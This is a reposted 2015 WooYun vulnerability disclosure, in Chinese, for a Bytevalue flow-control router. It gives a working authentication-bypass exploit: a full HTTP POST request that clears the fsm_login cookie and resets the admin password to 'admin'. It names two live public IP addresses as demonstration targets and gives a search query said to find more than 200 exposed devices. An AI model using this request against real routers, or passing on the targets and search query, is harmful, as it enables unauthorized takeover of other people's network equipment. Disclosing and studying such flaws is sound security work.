百为流控路由管理员密码重置漏洞
漏洞概要
缺陷编号:
WooYun-2015-99869
漏洞标题: 百为流控路由管理员密码重置漏洞
相关厂商:
深圳市百为百达科技开发有限公司
漏洞作者:
10457793
提交时间: 2015-03-09 12:24
公开时间: 2015-04-30 18:48
漏洞类型: 设计不当
危害等级: 高
自评Rank: 20
漏洞状态: 未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org
Tags标签: 无
漏洞详情披露状态:
2015-03-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-30: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
RT
详细说明:
RT
案例百度可以搜索到200+
intitle:bytevalue
百度第4页至第31页都是,估计还有很多没有被检索到的。
漏洞证明:
演示地址
code 区域http://220.161.90.230:2011/
http://61.156.217.133:2011
POST数据如下
code 区域POST /goform/webForm HTTP/1.0
Referer: http://61.156.217.133:2011/maint/admin.htm?opener=home
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Accept: */*
Accept-Language: zh-CN
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 61.156.217.133:2011
Content-Length: 52
DNT: 1
Pragma: no-cache
Cookie: fsm_u=admin; fsm_login=
cmd=MODIFY_PWD&json=%7B%22NewPwd%22%3A%22admin%22%7D
正常请求中包含fsm_login的值,为权限验证值
直接删掉fsm_login的值更换host即可绕过权限验证
修改host即可实现攻击不同目标,将admin用户密码修改为admin
返回如下信息标示修改成功
登录
修复方案:
版权声明:转载请注明来源
10457793@
乌云
漏洞回应
厂商回应:未能联系到厂商或者厂商积极拒绝
原文:http://www.wooyun.org/bugs/wooyun-2015-099869
[
本帖最后由 linda 于 2016-1-12 18:35 编辑 ]
搜索更多相关主题的帖子:
百为 流控 路由器 非授权访问 密码泄露 bytevalue 百为 流控 路由器 非授权访问 密码泄露 bytevalue Cookie欺骗